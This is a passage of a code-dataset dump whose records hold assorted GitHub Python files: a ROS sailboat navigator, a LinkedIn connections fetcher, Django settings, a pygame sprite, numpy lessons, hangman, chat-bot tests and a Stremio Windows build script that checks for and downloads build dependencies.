best_heading < wind_coming + layline:\n\n # ... and there's new wind data or a new target, update the upwind path\n if new_wind or is_new_target:\n new_wind = False\n is_new_target = False\n\n # If the current heading is still acceptable, carry on\n #if target_heading <= wind_coming-layline+3 or target_heading >= wind_coming+layline-3 and not is_new_target:\n #\tbest_heading = target_heading\n #else:\n # If the waypoint is to the right of the wind...\n if best_heading > wind_coming:\n best_heading = wind_coming + layline\n else:\n best_heading = wind_coming - layline\n\n # If there isn't new wind data, DON'T update the heading\n else:\n best_heading = target_heading\n\n # If the target heading has updated, decide if we need to tack, then publish the new heading\n if best_heading is not target_heading:\n target_heading = best_heading\n\n # If the our headings are more that 180 degrees apart, reverse travel direction\n if (abs(target_heading - cur_boat_heading)) > 180:\n boat_dir = 1\n else:\n boat_dir = -1\n\n # Which direction the wind is coming from\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # TODO: This may be broken now that is_within_bounds is not bi-directional\n if (boat_dir is 1 and not angles.is_within_bounds(wind_coming, cur_boat_heading, target_heading)) or\\\n (boat_dir is -1 and angles.is_within_bounds(wind_coming, cur_boat_heading, target_heading)):\n\n # Determine which direction to tack based on the side that our goal is on\n if angles.is_within_bounds(target_heading, 90, 270):\n tacking_direction = -1\n else:\n tacking_direction = 1\n\n heading_pub.publish(target_heading)\n\n goal = TackingGoal(direction=tacking_direction)\n tacking_client.send_goal(goal)\n\n # Adjust time delay until the tack is considered failed, and we return to planning\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n\n rospy.loginfo(rospy.get_caller_id() + \" Boat State = 'Autonomous - Planning'\")\n else:\n # Publish new heading for the rudder\n heading_pub.publish(target_heading)\n rospy.loginfo(rospy.get_caller_id() + \" New target heading: %f\", target_heading)\n\n 
rospy.Rate(100).sleep()\n\n\n##\tInitialize the node\n#\n#\tSets up all of the subscribers, initializes the node, and blocks until\n#\tthe action servers are ready\n#\ndef init():\n rospy.init_node('navigator')\n rospy.Subscriber('boat_state', BoatState, boat_state_callback)\n rospy.Subscriber('gps_raw', GPS, gps_callback)\n rospy.Subscriber('anemometer', Float32, anemometer_callback, queue_size=1)\n rospy.Subscriber('target_point', Waypoint, target_callback)\n rospy.Subscriber('compass', Float32, compass_callback, queue_size=1)\n\n # If the filters work, change lps to use /odometry/filtered\n rospy.Subscriber('lps', Point, position_callback, queue_size=1)\n max_vmg_client.wait_for_server()\n tacking_client.wait_for_server()\n layline_client.wait_for_server()\n rospy.spin()\n\n\nif __name__ == '__main__':\n try:\n init()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"uwsailbot/boat_2018","sub_path":"boat_nav/src/navigator_node.py","file_name":"navigator_node.py","file_ext":"py","file_size_in_byte":20914,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"41972090154","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport cPickle\nfrom linkedin import linkedin\nfrom linkedin.exceptions import LinkedInError\n\nCONSUMER_KEY = sys.argv[1]\nCONSUMER_SECRET = sys.argv[2]\nUSER_TOKEN = sys.argv[3]\nUSER_SECRET = sys.argv[4]\n\n# Parses out oauth_verifier parameter from window.location.href and\n# displays it for the user\n\nRETURN_URL = 'http://miningthesocialweb.appspot.com/static/linkedin_oauth_helper.html'\n\nauthentication = linkedin.LinkedInDeveloperAuthentication(CONSUMER_KEY, CONSUMER_SECRET,\n USER_TOKEN, USER_SECRET,\n RETURN_URL, linkedin.PERMISSIONS.enums.values())\n# Pass it in to the app...\n\napi = linkedin.LinkedInApplication(authentication)\n\n# Now do something like get your connections:\n\nif api:\n connections = api.get_connections()\nelse:\n print >> sys.stderr, 'Failed to authenticate. 
You need to learn to dance'\n sys.exit(1)\n\n# Be careful - this type of API usage is \"expensive\".\n# See http://developer.linkedin.com/docs/DOC-1112\n\nprint >> sys.stderr, 'Fetching extended connections...'\n\nextended_connections = []\ntry:\n for c in connections['values']:\n extended_connections.append(api.get_profile(member_id=c['id'], member_url=None, selectors=[\n 'first-name',\n 'last-name',\n 'current-status',\n 'educations',\n 'specialties',\n 'interests',\n 'honors',\n 'positions',\n 'industry',\n 'summary',\n 'location',\n ]))\nexcept LinkedInError:\n pass\n\n# Store the data\n\nif not os.path.isdir('out'):\n os.mkdir('out')\n\nf = open('out/linkedin_connections.pickle', 'wb')\ncPickle.dump(extended_connections, f)\nf.close()\n\nprint >> sys.stderr, 'Data pickled to out/linkedin_connections.pickle'\n","repo_name":"ptwobrussell/Mining-the-Social-Web","sub_path":"python_code/linkedin__get_connections.py","file_name":"linkedin__get_connections.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"53"}
{"seq_id":"71896703207","text":"# defines settings for applications using the DockerEc2 construct\nfrom .base import * # noqa\n\nDEBUG = False\n\nAWS_DEFAULT_ACL = None\nSTATICFILES_STORAGE = \"backend.storage_backends.StaticStorage\"\n\nAWS_STATIC_LOCATION = \"static\"\n\nAWS_PRIVATE_MEDIA_LOCATION = \"media/private\"\nPRIVATE_FILE_STORAGE = \"backend.storage_backends.PrivateMediaStorage\"\n\nAWS_PRELOAD_METADATA = True\nAWS_STORAGE_BUCKET_NAME = os.environ[\"S3_BUCKET_NAME\"] # noqa\nAWS_S3_CUSTOM_DOMAIN = f\"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com\"\nSTATIC_ROOT = f\"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/\"\nMEDIA_ROOT = f\"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/\"\n","repo_name":"briancaffey/django-step-by-step","sub_path":"backend/backend/settings/swarm_ec2.py","file_name":"swarm_ec2.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"53"}
{"seq_id":"20493451590","text":"import pygame\n\n\nHEIGHT = 350\nWIDTH = 700\ndisplaysurface = pygame.display.set_mode((WIDTH, HEIGHT))\n\nclass Dungeon(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.hide = False\n self.image = pygame.image.load(\"assets/Dungeon.png\")\n \n def update(self):\n if self.hide == False:\n displaysurface.blit(self.image, (400, 80))","repo_name":"bucs110FALL22/final-project-sangyoon-and-brian","sub_path":"src/dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42731275462","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 17 14:07:35 2020\r\nThis code is for the WuDL course\r\nIt follows the video at www.bilibili.com/keyword?=深度学习_Deep_Learning_Pytorch特别制作版\r\n@Description: This file covers Lecture 11 (C1_W2_11) of Andrew Ng's course and illustrates\r\n 1. Why for loops should be avoided as much as possible in deep learning\r\n 2. The broadcasting rules in numpy\r\n 3. Vector operations in numpy\r\n@author: Netfather\r\n@Last Modified date: January 19, 2021\r\n\"\"\"\r\n#%%\r\n# 0. Import the required packages\r\nimport numpy as np\r\nimport time\r\nimport math\r\n\r\n\r\n#%%\r\n#1.Code on C1_W2_11\r\n# Introduce vectorized operations; the example below shows the speed advantage of vectorization\r\n# In deep learning, for-loop code should be avoided whenever possible\r\n\r\n\r\na = np.random.rand(1000000)\r\nb = np.random.rand(1000000)\r\n\r\n# Vectorized implementation of the element-wise dot product of a and b\r\ntic = time.time()\r\nc = np.dot(a,b)\r\ntoc = time.time()\r\n\r\nprint(c)\r\nprint(\"The vectorized version: \" + 
str((toc-tic)*1000) + \"ms\")\r\n\r\n# For-loop implementation of the element-wise dot product of a and b\r\nc = 0\r\ntic = time.time()\r\nfor i in range(1000000):\r\n c += a[i]*b[i]\r\ntoc = time.time()\r\n\r\nprint(c)\r\nprint(\"The For loop version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#%%\r\n#2.Code on C1_W2_12\r\n# The following code compares ways of exponentiating a column vector\r\n\r\na = np.random.rand(1000000).reshape(1000000,1)\r\n\r\n# For-loop code that exponentiates the vector element by element\r\ntic = time.time()\r\nfor i in range(1000000):\r\n if (i % 100000 == 0): \r\n print(a[i,0])\r\n temp = math.exp(a[i,0])\r\ntoc = time.time()\r\nprint(\"The For loop version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n# Vectorized code that exponentiates every element of the vector\r\ntic = time.time()\r\na = np.exp(a)\r\ntoc = time.time()\r\n\r\nprint(\"The vectorized version: \" + str((toc-tic)*1000) + \"ms\")\r\n\r\n#%%\r\n#3.Code on C1_W2_15\r\n# This part demonstrates numpy's broadcasting rules in Python\r\n# Broadcasting is one of numpy's most distinctive features: two arrays whose shapes do not\r\n# fully match but are compatible in some dimensions are broadcast to a common shape under fixed rules, then the operation is applied\r\n\r\nA = np.array([[56.0,0.0,4.4,68.0],\r\n [1.2,104.0,52.0,8.0],\r\n [1.8,135.0,99.0,0.9]])\r\n\r\nprint(A.shape)\r\n\r\nrow_Sum = A.sum(axis =0)\r\nprint (row_Sum, row_Sum.shape) # once an axis is summed over, that dimension disappears, so a reshape is needed below\r\n\r\npercentage = A.T / row_Sum.reshape(4,1) # numpy aligns the column dimension first in this operation\r\nprint(percentage)\r\npercentage2 = A / row_Sum.reshape(1,4) # numpy aligns the column dimension first in this operation\r\nprint(percentage2)\r\n\r\nB = np.arange(1,7).reshape(2,3)\r\nprint(B)\r\n\r\n# addition where the number of columns matches\r\nC = np.array([100,200,300]).reshape(1,3)\r\nprint(B+C)\r\n# addition where the number of rows matches\r\nD = np.array([100,200]).reshape(2,1)\r\nprint(B+D)\r\n\r\n#%%\r\n#4.Code on C1_W2_16\r\n# Notes on numpy vector operations\r\n\r\na = np.random.randn(5)\r\nprint(a,a.shape)\r\n# Be very careful with the row or column whose dimension has collapsed!\r\n\r\nprint(np.dot(a,(a.T)))\r\n\r\n# To avoid ambiguity, explicitly specify the exact shape you want after reshape\r\nb = np.random.randn(5).reshape(5,1)\r\nprint(np.dot(b,b.T))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"WuDeepLearningCourse/C1_W2_CourseCode.py","file_name":"C1_W2_CourseCode.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"1258829862","text":"# Name:\n# MIT Username: \n# 6.S189 Project 1: Hangman template\n# hangman_template.py\n\n# Import statements: DO NOT delete these! DO NOT write code above this!\nfrom random import randrange\nfrom string import *\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n# Import hangman words\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. 
Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print( \" \", len(wordlist), \"words loaded.\")\n print('Enter play_hangman() to play a game of hangman!')\n return wordlist\n\n# actually load the dictionary of words and point to it with \n# the words_dict variable so that it can be accessed from anywhere\n# in the program\nwords_dict = load_words()\n\n\n# Run get_word() within your program to generate a random secret word\n# by using a line like this within your program:\n# secret_word = get_word()\n\ndef get_word():\n \"\"\"\n Returns a random word from the word list\n \"\"\"\n word=words_dict[randrange(0,len(words_dict))]\n return word\n\n# end of helper code\n# -----------------------------------\n\n\n# CONSTANTS\nMAX_GUESSES = 6\n\n# GLOBAL VARIABLES \nsecret_word = '' # Change this \nletters_guessed = []\n\n# From part 3b:\ndef word_guessed():\n '''\n Returns True if the player has successfully guessed the word,\n and False otherwise.\n '''\n global secret_word\n global letters_guessed\n\ndef is_word_guessed(secret_word,letters_guessed):\n word_length=len(secret_word)\n Runs=list(range(word_length))\n missing_letter=0\n for i in Runs:\n test=secret_word[i]\n if (test in letters_guessed)==False:\n missing_letter=1\n if missing_letter==0:\n return True\n elif missing_letter==1:\n return False\n\ndef print_guessed():\n '''\n Prints a string that contains the word with a dash \"-\" in\n place of letters not guessed yet. \n '''\n global secret_word\n global letters_guessed\n \ndef get_guessed_word(secret_word,letters_guessed):\n word_length=len(secret_word)\n Runs=list(range(word_length))\n Progress=''\n for i in Runs:\n test_letter=secret_word[i]\n if (test_letter in letters_guessed)==True:\n Progress=Progress+test_letter\n elif (test_letter in letters_guessed)==False:\n Progress=Progress+'_ '\n return Progress\n\ndef get_available_letters(letters_guessed):\n alphabet='abcdefghijklmnopqrstuvwxyz'\n Runs=list(range(26))\n remaining_letters=''\n for i in Runs:\n if (alphabet[i] in letters_guessed)==False:\n remaining_letters=remaining_letters+alphabet[i]\n return remaining_letters\n\n\ndef play_hangman():\n global secret_word\n global letters_guessed\n\n secret_word=get_word()\n guesses_remaining=6\n warnings_remaining=3\n Win=False\n letters_guessed=[]\n available_letters='abcdefghijklmnopqrstuvwxyz'\n partial_word=get_guessed_word(secret_word,letters_guessed)\n\n while guesses_remaining>0 and Win==False:\n\n print(partial_word)\n print('----------------------')\n print('You have ', guesses_remaining, ' guesses left')\n print('Available letters: ', available_letters)\n\n guess=input(\"Choose a letter that might be in the word: \")\n\n if type(guess)==str and guess[0].islower()==False:\n guess=guess.lower()\n\n if (type(guess)!=str)==True or (guess in available_letters)==False:\n warnings_remaining=warnings_remaining-1\n print('Hangman only accepts letters as input, that you have not already guessed. You have ', warnings_remaining ,' warnings left.')\n if warnings_remaining<=0:\n guesses_remaining=guesses_remaining-1\n print('Invalid characters are being inputted. 
You have ',guesses_remaining,' guesses remaining.')\n else:\n letters_guessed.append(guess)\n\n Win=is_word_guessed(secret_word,letters_guessed)\n if Win==True:\n print('Congratulations, you have correctly guessed ', secret_word, ' as the word')\n return True\n elif Win==False:\n partial_word=get_guessed_word(secret_word,letters_guessed)\n available_letters=get_available_letters(letters_guessed)\n if (guess in secret_word)==True:\n print('That letter is in the word, you now have:')\n elif (guess in secret_word)==False:\n guesses_remaining=guesses_remaining-1\n print('That letter is not in the word, you still have: ')\n if guesses_remaining==0:\n print('You have failed to guess the word. The word is ', secret_word)\n return False\n\n # Update secret_word. Don't uncomment this line until you get to Step 8.\n # secret_word = get_word()\n\n","repo_name":"NaomiKennedy58/Hangman-Code","sub_path":"hangman_template.py","file_name":"hangman_template.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"71770666728","text":"# Dictionaries\n\n#Dictionaries use key/value pairs\n\n#key = a reference to a particular object\n#value = data storage mechanism you want to use\n\n# Create a dictionary\n\nstudent_1 = {\n \"name\" : \"Belal\",\n \"stream\" : \"Devops\",\n \"completed_lessons\": 4,\n \"completed_lesson_names\": [\"variables\", \"data_types\", \"set_up\"]\n}\n#Access data within a dictionary\n\nprint(student_1[\"stream\"])\n#Access particular parts of the list\nprint(student_1[\"completed_lesson_names\"][1])\n\n# changing a value in a dictionary\n\nstudent_1[\"completed_lessons\"] = 3\nprint(student_1[\"completed_lessons\"])\n\n# Removing items from a dictionary\n\nstudent_1[\"completed_lesson_names\"].remove(\"data_types\")\nprint(student_1[\"completed_lesson_names\"])\n\n#get the value\n\ncar = {\n \"make\": \"Ford\",\n \"model\": \"Fiesta\",\n \"colour\": \"Blue\",\n \"year\": \"2011\",\n}\n\nprint(car)\ncar[\"condition\"] = \"Moderate\"\n\nprint(car)\n","repo_name":"belalb100/tech201_collections","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4384639519","text":"import asyncio\nfrom asyncio.events import AbstractEventLoop\n\nimport pytest\nfrom aiohttp.client import ClientSession\n\nfrom chatto import errors, events\nfrom chatto.secrets import Secrets\nfrom chatto.youtube import YouTubeBot\nfrom tests.paths import SECRETS_PATH\nfrom tests.test_secrets import secrets\n\n\n@pytest.fixture()\ndef loop() -> AbstractEventLoop:\n # This has to use new even in < Python 3.10.\n return asyncio.new_event_loop()\n\n\n@pytest.fixture()\ndef youtube_bot() -> YouTubeBot:\n return YouTubeBot(\n \"riuebg0843b9g8n4gb8493\",\n \"f84ng0409gj490gh43809gh\",\n )\n\n\n@pytest.fixture()\ndef authed_youtube_bot() -> YouTubeBot:\n return YouTubeBot(\n \"riuebg0843b9g8n4gb8493\",\n \"f84ng0409gj490gh43809gh\",\n secrets_file=SECRETS_PATH,\n )\n\n\ndef test_create_youtube_bot(youtube_bot: YouTubeBot) -> None:\n assert youtube_bot.api_key == \"riuebg0843b9g8n4gb8493\"\n assert youtube_bot.channel_id == \"f84ng0409gj490gh43809gh\"\n assert youtube_bot.tokens == {}\n\n\ndef test_create_authed_youtube_bot(\n authed_youtube_bot: YouTubeBot, secrets: Secrets\n) -> None:\n assert authed_youtube_bot.api_key == \"riuebg0843b9g8n4gb8493\"\n assert 
authed_youtube_bot.channel_id == \"f84ng0409gj490gh43809gh\"\n assert authed_youtube_bot.tokens == {}\n assert authed_youtube_bot._secrets == secrets\n\n\ndef test_create_youtube_bot_no_channel_id() -> None:\n with pytest.raises(errors.MissingRequiredInformation) as exc:\n YouTubeBot(\"token\", \"\")\n assert str(exc.value) == \"a channel ID must be provided\"\n\n\ndef test_properties_on_creation(youtube_bot: YouTubeBot) -> None:\n assert not youtube_bot.loop\n assert not youtube_bot.session\n assert not youtube_bot.stream\n assert not youtube_bot.authorised\n assert not youtube_bot.authorized\n assert not youtube_bot.access_token\n assert youtube_bot.platform == \"youtube\"\n\n\ndef test_listen_decorator(youtube_bot: YouTubeBot) -> None:\n assert youtube_bot.events.callbacks == {}\n\n @youtube_bot.listen(events.MessageCreatedEvent)\n async def youtube_cb(event: events.MessageCreatedEvent) -> None:\n ...\n\n assert len(youtube_bot.events.callbacks) == 1\n\n\ndef test_create_session(youtube_bot: YouTubeBot, loop: AbstractEventLoop) -> None:\n loop.run_until_complete(youtube_bot.create_session(loop))\n assert isinstance(youtube_bot._session, ClientSession)\n assert youtube_bot.session == youtube_bot._session\n","repo_name":"parafoxia/chatto","sub_path":"tests/test_youtube.py","file_name":"test_youtube.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"14852405925","text":"# Title: Stremio Windows Build Script\n# Author: ShoobyDoo\n# Date: 2023-03-13\n# Edited: 2023-03-18\n# Version: 0.1.0\n\nimport os\nimport sys\nimport glob\nimport string\nimport time\nimport json\nimport subprocess\nimport shutil\n\nfrom pprint import pprint\nfrom typing import Union\nfrom ctypes import windll\n\nfrom helpers import Helpers\n\n\nclass Depends:\n def __init__(self):\n # [---------------------------------------------------------BUILD DEPENDENCIES---------------------------------------------------------] #\n # Git version: latest as of 2023-03-15\n self.GIT_URL = \"https://github.com/git-for-windows/git/releases/download/v2.39.2.windows.1/Git-2.39.2-64-bit.exe\"\n\n # Qt version: 5.12.7 x86 (indicated by Stremio)\n self.QT_URL = \"https://qt.mirror.constant.com/archive/qt/5.12/5.12.7/qt-opensource-windows-x86-5.12.7.exe\"\n\n # OpenSSL version: 1.1.1 32bit (indicated by Stremio)\n self.OSSL_URL = \"https://slproweb.com/download/Win32OpenSSL-1_1_1t.exe\"\n\n # NodeJS version: 8.17.0 x86 (indicated by Stremio)\n self.NODEJS_URL = \"https://nodejs.org/dist/v8.17.0/win-x86/node.exe\"\n\n # FFMPEG version: 3.3.4 32 bit (indicated by Stremio) (Prefaced by: Other versions may also work)\n self.FFMPEG_URL = \"https://github.com/GyanD/codexffmpeg/releases/download/4.3.1-2020-11-08/ffmpeg-4.3.1-2020-11-08-full_build-shared.zip\"\n\n # MPV version: latest (dev-i686 indicated by Stremio) as of 2023-03-15\n self.LIBMPV_URL = \"https://master.dl.sourceforge.net/project/mpv-player-windows/libmpv/mpv-dev-i686-20230312-git-9880b06.7z?viasf=1\"\n\n # VS Community version: 2017 (indicated by Stremio)\n self.VSCOMM_URL = \"https://download.visualstudio.microsoft.com/download/pr/4de9b77e-bbd8-4a05-a083-662e1a187b94/fa117cc0e7e02d61a420803605d5723993d590269e92d5b1cd85db2e7b60d48c/vs_Community.exe\"\n\n # CMAKE version: latest as of 2023-03-15\n self.CMAKE_URL = \"https://github.com/Kitware/CMake/releases/download/v3.26.0/cmake-3.26.0-windows-x86_64.msi\"\n # [---------------------------------------------------------BUILD 
DEPENDENCIES---------------------------------------------------------] #\n\n self.drives = []\n self.depend_paths = {\n \"git\": \"\",\n \"qt\": \"\",\n \"openssl\": \"\",\n \"vs_community\": \"\",\n \"nodejs\": \"\",\n \"ffmpeg\": \"\",\n \"mpv\": \"\"\n }\n self.ljust = 50\n \n # set the path to the config file if it exists, otherwise set to None\n self.cfg_path = glob.glob('./abs/abs.json')[0] if len(glob.glob('./abs/abs.json')) > 0 else None \n\n # do this in the instantiation instead of everytime we check a depend\n d_bitmask = windll.kernel32.GetLogicalDrives()\n \n for letter in string.ascii_uppercase:\n if d_bitmask & 1:\n self.drives.append(letter)\n d_bitmask >>= 1\n\n\n def check_depend(self, pgm_args: Union[str, list], pgm_name: str, pgm_url: str) -> None:\n \"\"\"\n Checks if a program is installed.\n\n Args:\n pgm_args (str | list): The arguments to pass to the program.\n pgm_name (str): The name of the program.\n pgm_out_filename (str): The filename to save the program as.\n \"\"\"\n\n try:\n time.sleep(0.15)\n print(f\"Checking if {pgm_name} is installed...\".ljust(self.ljust, '.'), end='')\n if type(pgm_args) == str:\n pgm_args = pgm_args.split()\n\n sp_pgm = subprocess.run(pgm_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n if sp_pgm.returncode == 0:\n print(f\"OK: \" + sp_pgm.stdout.decode().split('\\n')[0].strip())\n self.depend_paths[pgm_name.lower()] = pgm_args[0] \n \n except FileNotFoundError:\n print(f\"NO: {pgm_name} not on path...\\n\\nSearching default install paths on all drives...\")\n self.verify_depend(pgm_name, pgm_url)\n\n\n def verify_depend(self, pgm_name: str, pgm_url: str) -> None:\n # verify depend: Git\n if pgm_name == \"Git\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\Git\")\n\n # verify depend: Qt\n # TODO: could be refactored to be more generic?\n elif pgm_name == \"Qt\":\n # not going to use the self.check_path() method here because it's a bit different\n qt_path_struct = \":\\\\Qt\\\\Qt5.12.7\\\\5.12.7\"\n qt_path_struct_addons = \":\\\\Qt\\\\Qt5.12.7\\\\installerResources\"\n\n for drive_letter in self.drives:\n qt_webe = glob.glob(f\"{drive_letter}{qt_path_struct_addons}\\\\qt.qt5.5127.qtwebengine*\") # wildcard for webengine\n qt_msvc = glob.glob(f\"{drive_letter}{qt_path_struct_addons}\\\\qt.qt5.5127.win32_msvc*\") # wildcard for msvc\n qt_msvc_bin = glob.glob(f\"{drive_letter}{qt_path_struct}\\\\msvc*\") # wildcard for BASE_DIR/msvc/bin\n \n # check if default qt 5.12.7 install path exists \"C:\\Qt\\Qt5.12.7\\5.12.7\\msvc2017\\bin\\\"\n if len(glob.glob(f\"{qt_msvc_bin[0]}\\\\bin\\\\windeployqt.exe\")) > 0:\n self.depend_paths[pgm_name.lower()] = f\"{qt_msvc_bin[0]}\\\\bin\\\\windeployqt.exe\"\n print(f\"Found {pgm_name}! 
[{self.depend_paths[pgm_name.lower()]}]\\n\\nVerifying Qt Addons...\")\n \n if len(qt_webe) > 0 and len(qt_msvc) > 0:\n print(\"Qt WebEngine: OK\\nQt MSVC: OK\\n\")\n else:\n print(\"One of the following: [Qt WebEngine, Qt MSVC (32 Bit)] were missing from your Qt installation...\\nPlease correct this and try again.\")\n \n print(\"Checking if Qt is installed...\".ljust(self.ljust, '.') + f\"OK: {self.depend_paths[pgm_name.lower()]}\")\n break\n else:\n self.depend_not_found(pgm_name, pgm_url)\n\n # verify depend: OpenSSL\n elif pgm_name == \"OpenSSL\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files (x86)\\\\OpenSSL-Win*\\\\bin\\\\openssl.exe\")\n\n # verify depend: NodeJS\n elif pgm_name == \"NodeJS\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\nodejs\\\\node.exe\")\n\n # verify depend: FFMpeg\n elif pgm_name == \"FFMpeg\":\n self.check_path(pgm_name, pgm_url, \"ffmpeg.exe\")\n\n # verify depend: MPV\n elif pgm_name == \"MPV\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\MPV\\\\bin\\\\mpv.exe\")\n\n # verify depend: VS Community version 2017\n elif pgm_name == \"VS_Community\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2017\\\\Community\\\\VC\\\\Auxiliary\\\\Build\\\\vcvars32.bat\")\n \n # verify depend: CMake\n elif pgm_name == \"CMake\":\n self.check_path(pgm_name, pgm_url, \":\\\\Program Files\\\\CMake\\\\bin\\\\cmake.exe\")\n\n\n def check_path(self, pgm_name: str, pgm_url: str, path_struct: str) -> None:\n \"\"\"\n Checks if a specific path exists on any drive.\n\n Args:\n pgm_name (str): The name of the program.\n pgm_url (str): The URL to the program download.\n path_struct (str): The path structure to check.\n \"\"\"\n\n current_drive = \"\"\n for drive_letter in self.drives:\n current_drive += f\"{drive_letter}:\\\\, \" if drive_letter != self.drives[-1] else f\"{drive_letter}:\\\\\"\n print(f\"Checking {current_drive} for {pgm_name}...\", end='\\r')\n time.sleep(0.05)\n \n # if the path doesnt start with the colon, its likely a relative path\n if not path_struct.startswith(\":\"):\n path_to_check = glob.glob(f\"{path_struct}\")\n else:\n path_to_check = glob.glob(f\"{drive_letter}{path_struct}\")\n\n if len(path_to_check) > 0:\n self.depend_paths[pgm_name.lower()] = path_to_check[0]\n print(f\"\\n\\nFound {pgm_name}! 
[{self.depend_paths[pgm_name.lower()]}]\\n\")\n\n                # VERIFY: depending on the program, checking the version could be --version or just version\n                if pgm_name in ['OpenSSL']:\n                    pgm_args = [f\"{self.depend_paths[pgm_name.lower()]}\", \"version\"]\n                else:\n                    pgm_args = [f\"{self.depend_paths[pgm_name.lower()]}\", \"--version\"]\n\n                self.check_depend(pgm_args, pgm_name, pgm_url)\n                break\n\n            else:\n                print('\\n')\n                self.depend_not_found(pgm_name, pgm_url)\n\n\n    def depend_not_found(self, pgm_name: str, pgm_url: str):\n        print(f\"{pgm_name} not found on any drive.\")\n\n        if Helpers.ynp(\"Is it installed anywhere else?\"):\n            while True:\n                pgm_path = input(\"Enter the path to the program: \")\n                if os.path.exists(pgm_path):\n                    print(f\"Found {pgm_name} at: {pgm_path}\")\n                    break\n                else:\n                    print(f\"Could not find {pgm_name} at: {pgm_path}\")\n\n        else:\n            if Helpers.ynp(\"Would you like me to grab it?\"):\n                # have dlf return params and do the install here, so we can set the path\n                dlf = Helpers.download_file(pgm_url, f\"{pgm_name}.exe\")\n                \n                # dlf returns tuple with filename and file type\n                insf = Helpers.install_file(dlf[0], dlf[1])\n\n                # if install file didn't return None\n                if insf:\n                    self.depend_paths[pgm_name.lower()] = insf\n\n            else:\n                print(f\"Please install it manually and try again as the script may now break.\\nSee: {pgm_url}\")\n\n\n    def get_all_paths(self) -> dict:\n        return self.depend_paths\n\n\n    @staticmethod\n    def reset_config(config_path) -> None:\n        os.remove(config_path)\n\n\n    def write_config(self, key = None, value = None):\n        print(\"\\nChecking for existing config...\")\n\n        if self.cfg_path and key != None:\n            print(\"Existing config found. Reading...\")\n            conf = json.load(open(self.cfg_path))\n            conf['DEPENDS'][key] = value\n            \n            print(f\"Writing key/val: [{key} -> {value}] to config file...\")\n            json.dump(conf, open(self.cfg_path, 'w'), indent=4)\n        else:\n            # check to see if the abs path exists, otherwise create it\n            if not os.path.exists('abs'): os.mkdir('abs')\n\n            # generate the default config, which will be everything we've done in the program so far\n            print(\"No configuration file was found. Generating default...\")\n            default = {\n                'DEPENDS': self.get_all_paths()\n            }\n\n            # write the default config to the abs.json file\n            json.dump(default, open('./abs/abs.json', 'w'), indent=4)\n\n\n    def read_config(self, filename='abs.json', filepath = './abs/'):\n        if len(glob.glob(f\"{filepath}{filename}\")) > 0:\n            print(f\"Config ({filename}) found. Reading...\")\n            conf = json.load(open(f'{filepath}{filename}'))\n            return conf\n        else:\n            print(\"Error! No configuration file was found. 
Please run the script again to generate one.\\n(This should never fire, reproduce this error and report it to the developer.)\")\n\n\n @staticmethod\n def where_is_path_var(path_var):\n \"\"\"\n Returns the path of a variable in the PATH environment variable.\n \"\"\"\n for path in os.environ['PATH'].split(os.pathsep):\n if path_var in path:\n return f\"{path}\\\\{path_var}.exe\" # windows only\n\n\n def build_stremio(self):\n print(\"Building Stremio...\\nCloning Stremio repo...\")\n # subprocess.run([\"git\", \"clone\", \"--recursive\", \"https://github.com/Stremio/stremio-shell.git\"])\n print(\"\\ndone.\\n\")\n\n print(\"Setting up build environment...\")\n os.chdir(\"stremio-shell\") # since we just chdir'd into stremio-shell paths get shifted -> ../{whatever} ???\n \n # # TODO: DYNAMIC CHECK, DO NOT LEAVE HARD CODED\n # sys.path.append(\"C:\\\\Qt\\\\Qt5.12.7\\\\5.12.7\\\\msvc2017\\\\bin\")\n # sys.path.append(\"C:\\\\OpenSSL-Win32\\\\bin\")\n\n # input(os.getcwd())\n vcvars_out = subprocess.check_output(f'\"{self.depend_paths[\"vs_community\"]}\" && \\\n FOR /F \"usebackq delims== tokens=2\" %i IN (`type stremio.pro ^| find \"VERSION=4\"`) DO set 